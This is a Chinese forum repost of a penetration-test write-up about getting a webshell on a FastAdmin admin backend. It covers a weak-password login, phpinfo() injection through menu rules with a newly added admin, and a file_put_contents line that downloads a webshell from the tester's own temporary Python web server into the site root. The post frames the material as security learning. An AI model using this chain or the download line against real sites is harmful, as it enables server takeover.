天涯论坛

 找回密码
 立即注册
搜索
查看: 28|回复: 3

记一次FastAdmin后台Getshell

[复制链接]

2995

主题

220

回帖

9909万

积分

论坛元老

Rank: 8Rank: 8

积分
99099158
发表于 2024-10-10 03:44:23 | 显示全部楼层 |阅读模式

FastAdmin介绍

FastAdmin是基于ThinkPHP5和Bootstrap的极速后台研发框架,基于ThinkPHP行径功能实现的插件机制,持有丰富的插件和扩展,可直接在线安装卸载。

基于完善的Auth权限掌控管理、无限父子级权限分组、可自由分配子级权限、一个管理员可同期属于多个组别。

测试过程

在某次HVV的打点过程中,发掘某资产为FastAdmin搭建。下图为FastAdmin的报错页面,按照经验可判断该网站为FastAdmin搭建。

输入admin.php进入后台登录页面,弱口令进入后台。

进入后台找功能点getshell。后台默认会有插件管理功能,然则咱们在后台找到这个功能,咱们直接拜访插件管理的位置

/admin/addon?ref=addtabs

理论上离线安装 Fileix文件管理器 ,而后上传一句话木马就能够getshell,然则很可惜失败了。

接着翻后台,发掘按时任务功能,尝试反弹shell,写入反弹shell的语句后,在服务器上nc监听等待回连,然则发掘执行。

后面一看之前管理员设置过的按时任务执行过,失败!

继续翻后台,发掘在菜单规则中能够创建规则要求,尝试在功能点中写入phpinfo()。

必须写在权限管理中!

而后来到管理员管理中,添加一个管理员。

所属组别必须为二级管理员组!

添加完成之后,重新用新添加的账户登录后台,能够发掘phpinfo()被成功执行。

经过搜索$_SERVER[‘DOCUMENT_ROOT’]获取网站根目录,为/www/wwwroot/xxxxxxxxx/

找到根路径后注销账户,准备一个webshell木马名为1.php,放在自己的服务器上,运用python起步一个临时web。

python3 -m http.server8080

在回到管理后台其中,在一样的位置写入如下语句,将远程服务器的webshell木马下载到网站根目录。

file_put_contents(/www/wwwroot/xxxxxxxxx/shell.php,file_get_contents(临时web位置/1.php))

保留完成后,再次运用刚才新创建的用户登录

webshell木马已被成功写入。

总结

在打点过程中, 经过指纹识别软件进行指纹识别进行相应的漏洞利用,在未识别出指纹的需人工判断,按照报错页面的样式识别指纹一种较好的办法

整体打点过程:浏览网站—>发掘报错页面指纹为FastAdmin—>经过弱口令进入后台—>规则要求中写入phpinfo()—>得到网站根目录—>规则要求中写入webshell。文案源自:culprit(语雀)原文位置:https://www.yuque.com/culprit/note/nyvtuz排版:潇湘信安

黑白之道发布、转载的文案中所触及的技术、思路和工具仅供以安全为目的的学习交流运用,任何人不得将其用于违法用途及盈利等目的,否则后果自动承担!

如侵权请私聊咱们删文

END

多一个点在看多一条小鱼干





上一篇:青动CRM小程序源码-fastadmin插件高级授权可商用二开
下一篇:用这几个开源管理系统做项目,领导看了直呼专业
回复

使用道具 举报

3048

主题

3万

回帖

9910万

积分

论坛元老

Rank: 8Rank: 8

积分
99109040
发表于 2024-10-18 06:29:42 | 显示全部楼层
楼主继续加油啊!外链论坛加油!
回复

使用道具 举报

2996

主题

3万

回帖

9910万

积分

论坛元老

Rank: 8Rank: 8

积分
99109194
发表于 2024-11-8 14:11:12 | 显示全部楼层
软文发布论坛开幕式圆满成功。 http://www.fok120.com
回复

使用道具 举报

3123

主题

3万

回帖

9910万

积分

论坛元老

Rank: 8Rank: 8

积分
99108625
发表于 半小时前 | 显示全部楼层
论坛是一个舞台,让我们在这里尽情的释放自己。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

站点统计|Archiver|手机版|小黑屋|天涯论坛 ( 非经营性网站 )|网站地图

GMT+8, 2024-11-23 05:48 , Processed in 0.107216 second(s), 21 queries .

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.